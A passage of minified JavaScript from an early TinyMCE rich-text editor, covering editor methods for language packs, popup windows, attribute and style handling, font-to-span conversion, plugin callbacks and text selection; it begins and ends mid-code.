\t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p> <\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p> <\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var 